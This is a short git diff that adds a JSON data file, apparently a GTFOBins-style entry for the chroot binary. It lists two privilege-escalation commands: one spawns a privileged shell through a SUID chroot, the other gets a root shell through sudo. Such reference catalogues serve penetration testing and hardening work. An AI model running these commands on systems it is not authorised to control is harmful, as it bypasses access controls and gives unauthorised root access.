diff --git a/data/chroot.json b/data/chroot.json new file mode 100644 index 0000000..d17912a --- /dev/null +++ b/data/chroot.json @@ -0,0 +1,14 @@ +{ + "functions": { + "suid": [ + { + "code": "./chroot / /bin/sh -p\n" + } + ], + "sudo": [ + { + "code": "sudo chroot /\n" + } + ] + } +} \ No newline at end of file